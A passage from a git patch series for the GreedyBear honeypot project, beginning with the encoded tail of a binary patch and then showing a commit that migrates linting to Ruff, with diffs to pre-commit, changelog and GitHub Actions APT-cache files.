4#WpR=
z`SqHNjTI>LvLJx4VwdHr>Mr#FpzeP}uRB2m^jVSsvh+~CK4rwj>yGXP6LN)b^neI)
zL0N9+c0q91sY+3RsUWzn82+#3x;q~)f3W_z`2WOPl=Z^d|3d^({-dbwMD^v@)w61-
z%TQ_%bzDqP3C+ZEg!wtijGP{zX_8EpEV2N4lAld-sZfTyEF%QX6;m|BLcZf>7i?Dy
z2}HU}k8pm`8%(~C1IVX8#H&f#kFX41Os8=!SU*AWp4JsSW0RBpoy6{r(Qi%!N;@;!
z4~U2GXqk{w7r>k_QXGty86*IHqe5)@D!Qz}g)@*&=Pa!&$10&q4760-(}&Y8f(|6H62baV$%W5kNyXg_lRBGlpVbMkNa`CIyp9
z)_m;hf-5=#&?rD}x#v^Al^Pz69>Dy9CiOq_4V=iNcN6QU*>77`=Y3Fmmjq~pK(OK`
zOB}6`Cz!=>Dd3D;Q)eqEg5+3aha)p#m=NIjgh%rs(2f`&AB_z0fLX9xs1zgsT+xK0
z&R4|6UCPq(pUS~?%m@J;AXJECWU5{{BS5IS6MnNscmVieSd^MP0R4fr#IVAxRRUo*
z62OSi19Frw@LB5gfCK&x0kz(D8KG&;_Lw-jM4Wn{odv{Jn0k31qwC+KH(G;
zfPaHls3u7p!cg}7Qt6E=NC2EpMJ)C3AqAmcqsosNA+Tz>FNqO=*<0n7lYxK$eJ287
z1n^3137y!Wz8|CLP?tQ|Iny+};Hl5z5M$vwCQlI#O&l>21;7mxV`dY=gg|sCOYSoH
zYN-f;@MlI2N*MUm&qxsk{9G%kP4Vg)LJAdzQ2YTXC&!EsFoXI60cZpWdolf?a=(u+
z%Ruy}t#w)Eu$H6>oV?^Bk%#pIl7$g~Q5sYAfl!>3PC#VoCq$8Z|bsUURG6~@>`=I^1CaOV|T~@FF
zg$e}VmEzFuvNzN3Qg(GcrhC0ti{`>;I0m9I5?hhwwdrsq29o-K9%d=9VFS=qN3J;=d|GTb6dP?8y;
z2UMW=_gb!~1MsO!)}lok1pj@d^||w{cC(uRlGGp*J3@pIyHOJMe7Iq;gaCD-iC0`%
z&WM|b1Nly>Kz|2SsKPcqbj9nfSOZI|i1*kkEm+eQ(h3f(QVRrt9!6;N7N0s&``l`h
zrB)icu5!SS3;6Lg;QQMo3Bd2jBn0UOH)=$fPrnsQ2o+bBJ0RNB8zlY*BH$I43RpOx
zTSd}$fa)g}sMPwB)%36pV&(TK7>HoMn2YyT1NH3qQpzb9A(&H~@(8QvP=wJ15+Up1
z`crQ&yf=M26Zlwkik0zse~3D|-z_Vw=`PRl)9)mmD07GZ-4%pTwrHfB{7L-lUoO3LLPXhVkU}s%Bm94m%{E^p9&wVF`8iv`b(RXmM(u&a
z!?jHWz+6^F0ai#UwJ-v(BD#-lM?_xJr^CKF{h(d59Vc6=d9Tdhk&%;02-5Y7QkD@apysec
zt>_VO<62{#GRkMmFB220AK>op5IVP=8zn`<6H~{cj*@bKmzEl$UdNPSReR7IA{+^lN
zkqN+Gm`Mo5>Ih*%@FPN0LWs906-nad!MT~#y+@f0NZnm(f%{>~`;!F=?7#l-2c;TS
z76*YM#`M7xrFfZN&%-P_%DJ;=yX+3-fS(>>6kf_Y!d{uyd$E@NvLu8?Yn?~fLT5Yv
zH0K#EN7T{XN&-H8Kq;C4g3HV*MF@D7BNGB0i(*A5Qv_CW;IoJu+ocv(gFH_wDk4h#
zR;dHGGS?MCgAn|S%~g4ZZz9)eUAjMm+lKGu0Pi@mlwUm$%;GF1$|c2NF42c%T!feu
z8vGbNR&Cf|8)X5aZdd4!9UD50036HY_@yYfkT2%UfaB*@Ze3d<{3)3LeBGT1!AiCo
zc|yo(K4n=>^niwh(yAA`UioY)Q6PeO)27*U0b`jGWw9v6E2~!7w#3BmoP=<2w_*!K
ze8-9q05@}SGw$y^yyEtQ6|6?oCZinR%;W;xxi~+d4{{J?pAQ`FYpiEaFI}p%kJ2rq
zP`jcv!{Xc4giq@P{L(po@iKl|L$drxu+l6?O57!fT5aG^i`^*x8QFa5Z-=>#QGq-$
z*+iq*nOB;T7+0Vp`RjPCVEEDaJt1NotbtX{nAI)9ae{*dCDm+%?T&K@%iNA>{x_`
ziD>fW2BI#&&veLd+;*GGEa&Z6o_jHSOfl3l(FG$XPn_2RB(DX
z8Wd=SKL?vWA(L-zAsW#q;J>bXin?f4)5-kS_;o
z(PN7jyCk`3axXo(?llp@vw=tyuAnQn`)i4&Gp}-binrAQ{(0j17oB#RKC*KzW
zu?IeFXWNN=s<+T}G@C3Ox5{Gn3<-r3vVUA*7T|cNs;;(J@W}#=?{;n69B*K
zM4j|IrhX;gU20d?Zh1lw5x5b721E(5@U0@h&FAH$`pI}r!%O715%aOnzwdoEMMHls
z<<4JUiEqRr{1107T4WEu@Pd2QN!woH1N-n0{`i2
zuXU$J0dZQL5+$R;6_FFY=s&cAjuUxQ5#0Z@JvDac^ZgWV?Zp4I>T~@F%lNu1YphPL
zYb&)sVY{kSb%pEsi9OQs@Al;DSJ}ls9bj#*sOv{7=x!Vf=fF1#6$qw(Tg+}B#iC4s
z&PitH!x{1`{;i{`#SVI)Cr%?U5jx+l0kQjLD-FMp|IU)ThLcXC}mNeV6
zLxdU^E&!hiGAOq?`$jpizIwX-(-N>z`0C1@0rNa21@q}x`_^yt@C!5}?cD?}5vxt-
zKvR}hd#EYWpZmZ({#$21}sG0AM~jN&WJcLiz4St81h
zmU{Mi3TY@jcIK-z|1tWL&o8ym-jbColQY2LVnCMc)i?iTPad8a`;>XDmu;;#I1q(td8_2Wy65SqyKNNkZATx#!+NEZ
zP-Nt!3@%?qY~q|?j;ueq%x}_;_`-dfWwoi)+Q`1%@HfCm`M+IDNIfopNK)w)@9E#(
zOQKI78>EbL+5GTfj?X*o2^>HCY;5-!0`Luk5EvE}!|g@{lR%r5tcM6DG5fysdefQb((h0hY2oQrP$l#|-9v`f5gQO@V
zr8qWpT;+5DV(op=vyvFh&5ic^D)fymwOvj-S~*J(d7`LsKJyCxn!;Ojel>ZECQOtkr5JUKA47Y84=VBumAka#-;q8N$1w
zARfT^v524~!Yvy$!|D`;XQV~}DXYDeCM2BGsGP>=9^q1H&QD(<#u4H9ufO`0y(E)o
zSnQ!EZx;A(*wB~+|M4K|g!?SKU3M^BxU#O?h7eT$9r7dG-xK0bfU8B|0@o-|bNy_JCHWu)!GPk4Bj*J3rK9%qH>4{N$_hw9QjGb4eiq;5l19|
zzg3Bx6ef{5NhH12h`*F^AvSo7tBd-X6vTqpE=#sIjYh1B(~$ECgWx$Hefeeksmz?O
z$HvgZdwAgpY2bsgXYT#qyC&*lh-TrhruvpxIhsSXQXbW*qz~;|qIZ@(*
zaEQ76I);;|O*+8i61!eNZ15Z()GejxT+@G94-_Q0(k$l64URF;@=2&&U_Sa};s}
z(q2H%2fO}etsRVKm$2p?iAC>x+nsSiop^~r|8A%Ph#Nv|=`YI(6GCQAm|znmuM-4@*y5}n
zI@OI3I?oq=BWAFmG}Hf>1%<2(m^g+GfT#uVH>FJuQTJ*BPyE@tvSv#2^%wOGA)ax$
zLc+&N&j|dkJl9+1&b8|TCnmc%Mq
z(9(b}8~+G#{To*|+Q&BZ5%H@JP9WgB4$+^WXZ)`d;2T0%pafq}HN|iI!Nk`2za80b
z2WkWqVc$Qj0|&&Q!YcE`zO&K{lSSAj%K__-p$sD56AlgN;h1n(tUdhRtN8-k1g1@z
zG_y~m0>y&}@r#e+{2P|JV-@?Og~DU=6bZ^GlOR+^f*}&|PLnu4w+Dn-@k1CT|?3R^X5RYH6J}I#x
zkBJg5@41)7?ed1BHs{L!9nyN!|Bh^*|KL!~AFk6&Pb?McAKVcGAVPjlfGHCgPR0k!
zI_^Ko^8tDYM6O2=d!($!murr|#^qhpNn@s4?9>Z`x)W0(ou~(4(O&4@#s{c#6^no{+##JbscX`rjwqcihgCAavp75A{28
z)54)g=06}pc(qw6S}~jIzhisB`_KC9oZ?FYQvPT9x3}~#XL-jui?4doY`^9fcV$ti
zMQqx67H^a<1brmj*c|uuPD39@)koZZ?!FqkO2EH*dv6i6DKPRG90T859Yb&VoExOuLk(XUy#5ywcZnI+Jlx4YKP
z*;A(|&U&S*k+DiLzO<&30{Fg*!mrZrJE6bh(h*vuEDI_(DQs@OaA0d1+ibnE!L3*R
z@Xh+{kWYbRQgSrgVFAi#NWuNzpdTzXG@xCdwzxfdaIw91aH-bC(sH30xl6mcBZDjp
zXKL!<6cKQ}z1pwcmWrS^=viDEL^Xi64iT3h)v8?ntu;1QV$KMKk2LE!m|%oGUxDR{
z&O9+?{6g>Gq$2>|At=k!5>_M4@SU%Z96Etw3=hS@!}M{!Jx`^xq;@8(;KBADLFo5d
z@8ni{vD=o8N~IS`<;TZL!`w9Q*rDAN+RP_-CS`}#cCG&LY{XfetiV?{xN_1GfbRfL
z2m;7W5@yPrv)n~#;S-Hb0Y8;csu-7^_uOK~KiPrr-~UNZ0KOw2gvoA1h>H+<^(aE9
z1n?OFsvO_H?bLUb08)M7wo)TP{HBVgbIG_*l%FZ!r$n79$B)u;(a)(8K#sl&6GC^7
z2r1xKMV%b4r((OS1W=$W!=h1Fj|i0jeoEBokU8@OWlMfU2Cr(#)dN)m$kj6$`@3>P
zs08o>t5sFG&3J7Ee^v>gU>BvIP{|SDclNp}kJ)vGj2|rUT?r;`k@09Y6i;6#uJA
z0LAy2yP^^!0%l1HiNT5mewE|9t}FXbl>o}@!Z0C}q9YV@`>GwknBIzZZj}I{^;5yK
zx{?q8e!8ghY*o1}_(r0gP$ht9{S^7Eu#QlQ`80eZ&+#Q5J)sZ=<<2aBMU-&;)$Jfm
zq}mT%&;#WVLKXO3@IrD_Ssej#bWEjohee}8BZ3EhHCCrmyipqf2(Q@
z5qh9X01-N=D^6iVm}&?96tu6h=AR`Je|5#Js&(e+f&U-6BonLrr6Z640000
Date: Sat, 3 Jan 2026 21:11:26 +0530
Subject: [PATCH 25/75] Migrate from flake8/black/isort to Ruff (#663)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* Squashed '.github/' changes from aa1fe1a..5a78179
5a78179 Merge pull request #223 from certego/develop
76df2c2 added ruff and fixed a bug (#221)
59bfe83 Explicitly disabled "xpack.security" in Elasticsearch container
0c262e2 Updated CHANGELOG
0599640 Fixed create_python_cache workflow (#222)
4f21023 Added documentation - part 2 (#220)
0d2f931 updated github actions versions (#218)
013f31a Python caching revisited (#217)
548235b Linter requirements reconciliated (#215)
b6fd709 Updated changelog
0cfa137 Ecr (#201)
ed2dd16 Updated codeQL action to v3 (#216)
5f44be8 APT caching revisited (#214)
cf7c16d Updated linters and added changes detection exclusions (#213)
a492676 Deprecation of license check `table-headers` (#212)
0a6db48 Updated python linters also in '_python.yml' workflow
git-subtree-dir: .github
git-subtree-split: 5a78179ab0cbea826c416f8975251b519c2541fc
* Simplify pre-commit to use only Ruff
- Removed black, isort, flake8, pylint, bandit, autoflake from pre-commit
- Ruff provides equivalent functionality for all of these
- Faster pre-commit execution
- Avoids conflicting linter rules
* Update documentation to reflect Ruff migration
- Replaced black and isort badges with Ruff badge in README
- Updated PR template checklist to mention Ruff instead of Black/Flake/Isort
* Run Ruff to fix linting and formatting issues
- Fixed 37 import sorting and unused import issues
- Reformatted 5 files with ruff format
- Fixed pre-commit ruff args (removed invalid 'check' argument)
- 14 wildcard import warnings remain (F403) which require manual review
* Add .ruff_cache to .gitignore
- Exclude Ruff's cache directory from version control
* Silence F403 wildcard import warnings
As per maintainer feedback, silenced F403 warnings for wildcard imports in __init__.py files since they are acceptable for this project.
* Add pyproject.toml and fix migration file imports
- Created pyproject.toml to extend ruff config for easier CLI usage
- Fixed import sorting in 5 Django migration files
- Now 'ruff check .' works without explicit --config flag
* Apply ruff formatting to remaining files
- Reformatted 30 Python files with ruff format
- This is the result of running 'ruff format .' after creating pyproject.toml
- No logic changes, only formatting (line breaks, spacing)
* Add empty packages.txt for certego/.github v2.0.0 compatibility
The new certego/.github v2.0.0 APT cache workflow requires a packages
file, even if empty. This is a workaround for the workflow's strict
validation that was introduced in v2.0.0.
* Add packages_path to workflow configuration
Pass packages.txt to the workflow to fix APT cache restoration step
* Make packages.txt truly empty
Remove comments that were being interpreted as package names by apt-get
* Specify RabbitMQ version for CI
Use rabbitmq:4-management-alpine to fix Docker image pull error.
The default 'latest' is not a valid tag for management-alpine images.
* Fix RabbitMQ version tag duplication
Use version '4' instead of '4-management-alpine' since the workflow
automatically appends '-management-alpine' suffix
* Expand Ruff rule coverage with comprehensive linting modules
Added comprehensive Ruff rule modules as requested:
- E/W: Full pycodestyle error and warning coverage
- N: pep8-naming for naming conventions
- UP: pyupgrade for modern Python syntax
- B: flake8-bugbear for common Python bugs
- C4: flake8-comprehensions for list/dict improvements
- DJ: flake8-django for Django-specific linting
All rules are documented with inline comments and links to official docs.
Fixed 43 auto-fixable violations (imports, annotations, etc).
Added comprehensive ignore list for intentional code patterns:
- Test helpers (mutable defaults, classmethods)
- ML conventions (X, X_train naming)
- Django patterns (null=True on CharField, models without __str__)
- Legacy naming (viewType, iocType, migration functions)
All checks passing ✅
* Fix easy E/N/UP/C violations as requested
Applied Ruff auto-fixes for straightforward style improvements:
- N804: Renamed 'self' → 'cls' in test classmethods (6 occurrences)
- UP008: Simplified super() calls (3 occurrences)
- UP031/UP032: Modernized string formatting (2 occurrences)
- C401: Fixed set comprehensions (7 occurrences)
Total: 18 violations fixed across 7 files.
Invasive changes (N801/N802 model/function renames, N803/N806 ML naming)
deferred to follow-up issue for dedicated testing and review.
---
.github/.pre-commit-config.yaml | 23 +-
.github/CHANGELOG.md | 40 +-
.github/actions/apt_requirements/action.yml | 25 -
.../restore_apt_cache/README.md | 29 +
.../restore_apt_cache/action.yml | 64 +++
.../apt_requirements/save_apt_cache/README.md | 22 +
.../save_apt_cache/action.yml | 24 +
.github/actions/codeql/action.yml | 5 +-
.../actions/misc/compute_files_hash/README.md | 18 +
.../misc/compute_files_hash/action.yml | 40 ++
.github/actions/push_on_ecr/action.yml | 56 ++
.github/actions/python_linter/action.yml | 37 +-
.../create_dev_requirements_file/README.md | 13 +
.../create_dev_requirements_file/action.yml | 28 +
.../create_docs_requirements_file/README.md | 12 +
.../create_docs_requirements_file/action.yml | 37 ++
.../create_linter_requirements_file/README.md | 32 ++
.../action.yml | 103 ++++
.../create_virtualenv/README.md | 20 +
.../create_virtualenv/action.yml | 28 +
.../restore_pip_cache/README.md | 41 ++
.../restore_pip_cache/action.yml | 53 ++
.../restore_virtualenv/README.md | 30 +
.../restore_virtualenv/action.yml | 43 ++
.../save_pip_cache/README.md | 22 +
.../save_pip_cache/action.yml | 36 ++
.../save_virtualenv/README.md | 23 +
.../save_virtualenv/action.yml | 29 +
.github/actions/services/action.yml | 1 +
.../configurations/python_linters/.ruff.toml | 90 +++
.../python_linters/requirements-linters.txt | 13 +-
.github/pull_request_template.md | 2 +-
.github/workflows/README.md | 217 ++++++++
.github/workflows/_detect_changes.yml | 45 +-
.github/workflows/_node.yml | 15 +-
.github/workflows/_python.yml | 521 ++++++++++--------
.github/workflows/_release_and_tag.yml | 76 ++-
.github/workflows/create_apt_cache.yaml | 38 ++
.github/workflows/create_python_cache.yaml | 55 ++
.github/workflows/pull_request_automation.yml | 13 +-
.github/workflows/release.yml | 6 +
.gitignore | 3 +
README.md | 3 +-
api/serializers.py | 3 +-
api/urls.py | 5 +-
api/views/command_sequence.py | 17 +-
api/views/cowrie_session.py | 21 +-
api/views/enrichment.py | 13 +-
api/views/feeds.py | 18 +-
api/views/general_honeypot.py | 5 +-
api/views/statistics.py | 3 +-
api/views/utils.py | 13 +-
authentication/admin.py | 5 +-
authentication/migrations/0001_initial.py | 55 +-
authentication/serializers.py | 11 +-
authentication/views.py | 57 +-
greedybear/admin.py | 13 +-
greedybear/celery.py | 4 +-
greedybear/cronjobs/cleanup.py | 6 +-
greedybear/cronjobs/commands/cluster.py | 2 +-
.../cronjobs/extraction/ioc_processor.py | 3 +-
greedybear/cronjobs/extraction/pipeline.py | 12 +-
.../cronjobs/extraction/strategies/cowrie.py | 21 +-
.../cronjobs/extraction/strategies/factory.py | 7 +-
.../cronjobs/extraction/strategies/log4pot.py | 11 +-
greedybear/cronjobs/extraction/utils.py | 8 +-
greedybear/cronjobs/firehol.py | 3 +-
greedybear/cronjobs/mass_scanners.py | 6 +-
.../cronjobs/repositories/cowrie_session.py | 3 +-
greedybear/cronjobs/repositories/elastic.py | 7 +-
greedybear/cronjobs/repositories/ioc.py | 7 +-
greedybear/cronjobs/scoring/ml_model.py | 3 +-
greedybear/cronjobs/scoring/random_forest.py | 9 +-
greedybear/cronjobs/scoring/scoring_jobs.py | 21 +-
greedybear/cronjobs/scoring/utils.py | 5 +-
greedybear/cronjobs/whatsmyip.py | 6 +-
greedybear/migrations/0001_initial.py | 1 -
greedybear/migrations/0002_ioc_cowrie.py | 1 -
greedybear/migrations/0003_statistics.py | 1 -
greedybear/migrations/0004_alter_id_field.py | 1 -
greedybear/migrations/0005_clients.py | 1 -
greedybear/migrations/0006_ioc_general_hps.py | 1 -
greedybear/migrations/0007_generalhoneypot.py | 1 -
.../migrations/0008_auto_20230120_1548.py | 1 -
.../0009_alter_ioc_general_field.py | 5 +-
.../migrations/0010_alter_ioc_related_ioc.py | 9 +-
..._seen_ioc_attack_count_ioc_asn_and_more.py | 32 +-
.../migrations/0014_auto_20250210_1258.py | 2 +-
...esession_greedybear__source__a3720f_idx.py | 5 +-
..._commandsequence_cowriesession_commands.py | 26 +-
...ter_commandsequence_first_seen_and_more.py | 6 +-
greedybear/migrations/0020_massscanners.py | 12 +-
...scanners_greedybear__ip_addr_2aa484_idx.py | 5 +-
greedybear/migrations/0022_whatsmyip.py | 18 +-
...tegories_alter_statistics_view_and_more.py | 25 +-
.../migrations/0025_merge_20251223_2100.py | 1 -
greedybear/models.py | 14 +-
greedybear/tasks.py | 2 +-
manage.py | 1 +
packages.txt | 0
pyproject.toml | 2 +
tests/__init__.py | 13 +-
tests/authentication/test_auth.py | 8 +-
tests/greedybear/cronjobs/test_firehol.py | 2 +-
tests/test_clustering.py | 23 +-
tests/test_cowrie_extraction.py | 7 +-
tests/test_extraction_strategies.py | 6 +-
tests/test_extraction_utils.py | 8 +-
tests/test_ioc_processor.py | 5 +-
tests/test_models.py | 6 +-
tests/test_repositories.py | 28 +-
tests/test_rf_config.py | 15 +-
tests/test_rf_models.py | 9 +-
tests/test_scoring_utils.py | 9 +-
tests/test_serializers.py | 25 +-
tests/test_views.py | 23 +-
116 files changed, 2241 insertions(+), 533 deletions(-)
delete mode 100644 .github/actions/apt_requirements/action.yml
create mode 100644 .github/actions/apt_requirements/restore_apt_cache/README.md
create mode 100644 .github/actions/apt_requirements/restore_apt_cache/action.yml
create mode 100644 .github/actions/apt_requirements/save_apt_cache/README.md
create mode 100644 .github/actions/apt_requirements/save_apt_cache/action.yml
create mode 100644 .github/actions/misc/compute_files_hash/README.md
create mode 100644 .github/actions/misc/compute_files_hash/action.yml
create mode 100644 .github/actions/push_on_ecr/action.yml
create mode 100644 .github/actions/python_requirements/create_dev_requirements_file/README.md
create mode 100644 .github/actions/python_requirements/create_dev_requirements_file/action.yml
create mode 100644 .github/actions/python_requirements/create_docs_requirements_file/README.md
create mode 100644 .github/actions/python_requirements/create_docs_requirements_file/action.yml
create mode 100644 .github/actions/python_requirements/create_linter_requirements_file/README.md
create mode 100644 .github/actions/python_requirements/create_linter_requirements_file/action.yml
create mode 100644 .github/actions/python_requirements/create_virtualenv/README.md
create mode 100644 .github/actions/python_requirements/create_virtualenv/action.yml
create mode 100644 .github/actions/python_requirements/restore_pip_cache/README.md
create mode 100644 .github/actions/python_requirements/restore_pip_cache/action.yml
create mode 100644 .github/actions/python_requirements/restore_virtualenv/README.md
create mode 100644 .github/actions/python_requirements/restore_virtualenv/action.yml
create mode 100644 .github/actions/python_requirements/save_pip_cache/README.md
create mode 100644 .github/actions/python_requirements/save_pip_cache/action.yml
create mode 100644 .github/actions/python_requirements/save_virtualenv/README.md
create mode 100644 .github/actions/python_requirements/save_virtualenv/action.yml
create mode 100644 .github/configurations/python_linters/.ruff.toml
create mode 100644 .github/workflows/README.md
create mode 100644 .github/workflows/create_apt_cache.yaml
create mode 100644 .github/workflows/create_python_cache.yaml
create mode 100644 packages.txt
create mode 100644 pyproject.toml
diff --git a/.github/.pre-commit-config.yaml b/.github/.pre-commit-config.yaml
index 42878d62..8da56aab 100644
--- a/.github/.pre-commit-config.yaml
+++ b/.github/.pre-commit-config.yaml
@@ -1,18 +1,9 @@
repos:
-- repo: https://github.com/pycqa/flake8
- rev: 7.1.1
+- repo: https://github.com/astral-sh/ruff-pre-commit
+ rev: v0.12.7
hooks:
- - id: flake8
- args: ["--config", ".github/configurations/python_linters/.flake8"]
-
-- repo: https://github.com/pycqa/isort
- rev: 5.13.2
- hooks:
- - id: isort
- args: ["--settings-path", ".github/configurations/python_linters/.isort.cfg", "--filter-files", "--skip", "venv"]
-
-- repo: https://github.com/psf/black
- rev: 24.8.0
- hooks:
- - id: black
- args: ["--config", ".github/configurations/python_linters/.black"]
+ - id: ruff
+ name: ruff-lint
+ args: ["--fix", "--config", "./.github/configurations/python_linters/.ruff.toml"]
+ - id: ruff-format
+ args: ["--config", "./.github/configurations/python_linters/.ruff.toml"]
diff --git a/.github/CHANGELOG.md b/.github/CHANGELOG.md
index 473e1c33..9bd60775 100644
--- a/.github/CHANGELOG.md
+++ b/.github/CHANGELOG.md
@@ -1,5 +1,40 @@
# Changelog
-From the v1.3.0 afterwards please check the Release Pages on Github for information regarding the changelog
+From the v1.3.0 onwards please check the Release Pages on Github for information regarding the changelog
+
+## Certego .github Package Changelog
+
+## 2.0.x
+### 2.0.0
+#### Features
+* Added "release.yml" action to to push containers to AWS ECR
+* Added *create_apt_cache.yaml* workflow to cache APT requirements each time a commit is pushed on selected branch and **when the requirements file has changed**.
+* Added documentation.
+* Added "Ruff" to the list of available Python linters.
+#### Bugfix
+* Updated python linters also in '_python.yml' workflow (missing from previous release)
+* Explicitly disabled `xpack.security` in Elasticsearch container, since it is enabled by default in newer versions of Elasticsearch
+* Added missing inputs for "create_linter_requirements_file" action.
+#### Changes
+* Deprecation of license check table-headers
+* Updated Python linters:
+ * bandit 1.7.9 -> 1.8.3
+ * black 24.8.0 -> 25.1.0
+ * flake8 7.1.1 -> 7.1.2
+ * isort 5.13.2 -> 6.0.1
+ * pylint-django 2.5.5 -> 2.6.1
+ * pylint 3.2.6 -> 3.3.5
+* Removed `awalsh128/cache-apt-pkgs-action@latest` action and rewrote APT caching using GitHub's `actions/cache/restore@v4` and `actions/cache/save@v4`.
+* Added both frontend and backend exclusions on _detect_changes.yaml (paths that won't be considered by git diff)
+* Updated CodeQL action v2 -> v3 (v2 has been [deprecated](https://github.blog/changelog/2024-01-12-code-scanning-deprecation-of-codeql-action-v2/) on december '24)
+* Removed `setup-python-dependencies` from `codeql/action.yml` since it has no effect anymore. See [this](https://github.blog/changelog/2024-01-23-codeql-2-16-python-dependency-installation-disabled-new-queries-and-bug-fixes/) for more information.
+* Linters versions in step `Create requirements-linters.txt` of `_python.yml` action are now computed according to `configurations/python_linters/requirements-linters.txt`. As of now, linter updates are only required in `configurations/python_linters/requirements-linters.txt`.
+* Reworked Python requirements caching.
+* Updated some Github actions:
+ * setup-python v4 -> v5
+ * action-gh-release v1 -> v2
+* Added "Install system dependencies required by Python packages" step to "Create Python cache" workflow.
+
+## GreedyBear Changelog
## [v1.2.1](https://github.com/honeynet/GreedyBear/releases/tag/v1.2.1)
* Fixes and adjusts in the "Feeds Page"
@@ -42,4 +77,5 @@ Added support for all the other available honeypots! (#86)
## [v1.0.0](https://github.com/honeynet/GreedyBear/releases/tag/v1.0.0)
** FIRST RELEASE! **
-A new GUI is available to explore the data with an awesome dashboard!
\ No newline at end of file
+A new GUI is available to explore the data with an awesome dashboard!
+
diff --git a/.github/actions/apt_requirements/action.yml b/.github/actions/apt_requirements/action.yml
deleted file mode 100644
index 872cbe58..00000000
--- a/.github/actions/apt_requirements/action.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: Composite action install apt requirements
-description: Composite action install apt requirements
-inputs:
- working_directory:
- description: Working directory
- required: true
- requirements_file:
- description: Requirements file
- required: true
-
-runs:
- using: "composite"
- steps:
- - name: Export apt requirements
- id: export-apt-requirements
- run: |
- PKG=$(cat ${{ inputs.requirements_file }})
- echo apt_packages=$PKG | awk '{print}' ORS=' ' >> $GITHUB_OUTPUT
- shell: bash
-
- - name: Cache apt packages
- id: cache-apt-packages
- uses: awalsh128/cache-apt-pkgs-action@latest
- with:
- packages: ${{ steps.export-apt-requirements.outputs.apt_packages }}
\ No newline at end of file
diff --git a/.github/actions/apt_requirements/restore_apt_cache/README.md b/.github/actions/apt_requirements/restore_apt_cache/README.md
new file mode 100644
index 00000000..046b58e4
--- /dev/null
+++ b/.github/actions/apt_requirements/restore_apt_cache/README.md
@@ -0,0 +1,29 @@
+# Composite action restore APT cache
+
+This action restores an APT cache from GitHub's cache.
+
+Combined with [**save_apt_cache**](../save_apt_cache/README.md), it helps save time by avoiding the download of APT requirements.
+
+The action is composed of five steps:
+
+1. **Compute APT requirements files SHA256 hash** - This step uses [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) action to compute a single SHA256 hash of the APT requirements file described by the *apt_rquirements_file_path* input variable. The computed SHA256 hash will be part of the cache key.
+2. **Backup `/var/cache/apt/archives permissions`** - This step backs up the permissions associated to the `/var/cache/apt/archives` directory. So, after restoring the APT cache they can be restored to the original ones.
+3. **Add write permissions for all to `/var/cache/apt/archives`** - This step sets the write permission to the `/var/cache/apt/archives`. This is crucial because the [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) GitHub's action needs to be able to write to it. Without setting the correct write permission, a permission error is raised.
+4. **Restore APT cache** - This step restores the APT cache. It uses the GitHub's [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action with the following parameters:
+ * **path** - A list of files, directories, or paths to restore - set to `/var/cache/apt/archives/*.deb`.
+ * **key** - An explicit key for a cache entry - set to the combination of three strings:
+ * *git_reference*, provided as an input to the action.
+ * A static part, `-apt-`
+ * The previously computed SHA256 hash of the APT requirements file.
+5. **Restore original permissions to `/var/cache/apt/archives` and delete backup** - This step restore the original permissions to the `/var/cache/apt/archives` directory. Finally, the backup file is deleted.
+
+## Documentation
+
+### Inputs
+
+* **apt_requirements_file_path** - Required - Path to the APT requirements file. It will be used to compute a SHA256 hash used in the cache key.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `/merge`.
+
+### Outputs
+
+* **cache-hit** - A boolean value which is true when APT cache is found in the GitHub's cache, false otherwise.
diff --git a/.github/actions/apt_requirements/restore_apt_cache/action.yml b/.github/actions/apt_requirements/restore_apt_cache/action.yml
new file mode 100644
index 00000000..282935bd
--- /dev/null
+++ b/.github/actions/apt_requirements/restore_apt_cache/action.yml
@@ -0,0 +1,64 @@
+name: Composite action restore APT cache
+description: Composite action to restore APT cache
+inputs:
+ apt_requirements_file_path:
+ description: Path to the APT requirements file
+ required: true
+ git_reference:
+ description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+ required: false
+ default: ${{ github.ref_name }}
+
+outputs:
+ cache-hit:
+ description: Whether the APT cache was found in the GitHub's cache or not.
+ value: ${{ steps.restore_apt_cache.outputs.cache-hit }}
+
+
+runs:
+ using: "composite"
+ steps:
+ - name: Compute APT requirements file SHA256 hash
+ id: compute_apt_requirements_file_sha256_hash
+ uses: ./.github/actions/misc/compute_files_hash
+ with:
+ file_paths: ${{ inputs.apt_requirements_file_path }}
+
+ - name: Backup /var/cache/apt/archives permissions
+ id: backup_apt_cache_dir_permissions
+ run: |
+ PERMISSIONS_FILE_PATH="/tmp/apt_cache_dir_permissions.facl"
+ echo "apt_cache_dir_permissions_file=$PERMISSIONS_FILE_PATH" > $GITHUB_OUTPUT
+ sudo getfacl -p /var/cache/apt/archives > $PERMISSIONS_FILE_PATH
+ ARCHIVES_PERMISSIONS=$(ls -ld /var/cache/apt/archives)
+ echo "::debug::Original permissions given to /var/cache/apt/archives: $ARCHIVES_PERMISSIONS"
+ echo "::debug::Created /var/cache/apt/archives permissions backup to $PERMISSIONS_FILE_PATH"
+ shell: bash
+
+ # Vital to be able to restore cache
+ # If write permission is not set, a permissions error will be raised
+ - name: Add write permission for all to /var/cache/apt/archives
+ run: |
+ sudo chmod a+w /var/cache/apt/archives
+ ARCHIVES_NEW_PERMISSIONS=$(ls -ld /var/cache/apt/archives)
+ echo "::debug::New permissions given to /var/cache/apt/archives: $ARCHIVES_NEW_PERMISSIONS"
+ shell: bash
+
+ - name: Restore APT cache
+ uses: actions/cache/restore@v4
+ id: restore_apt_cache
+ with:
+ path: /var/cache/apt/archives/*.deb
+ key: ${{ inputs.git_reference }}-apt-${{ steps.compute_apt_requirements_file_sha256_hash.outputs.computed_hash }}
+
+ - name: Restore original permissions to /var/cache/apt/archives and delete backup
+ run: |
+ PERMISSIONS_FILE_PATH=${{ steps.backup_apt_cache_dir_permissions.outputs.apt_cache_dir_permissions_file }}
+ sudo setfacl --restore="$PERMISSIONS_FILE_PATH"
+ ARCHIVES_RESTORED_PERMISSIONS=$(ls -ld /var/cache/apt/archives)
+ echo "::debug::Restored original permissions to /var/cache/apt/archives: $ARCHIVES_RESTORED_PERMISSIONS"
+ if [[ -f "$PERMISSIONS_FILE_PATH" ]]; then
+ sudo rm "$PERMISSIONS_FILE_PATH"
+ echo "::debug::Correctly removed $PERMISSIONS_FILE_PATH permissions backup file"
+ fi
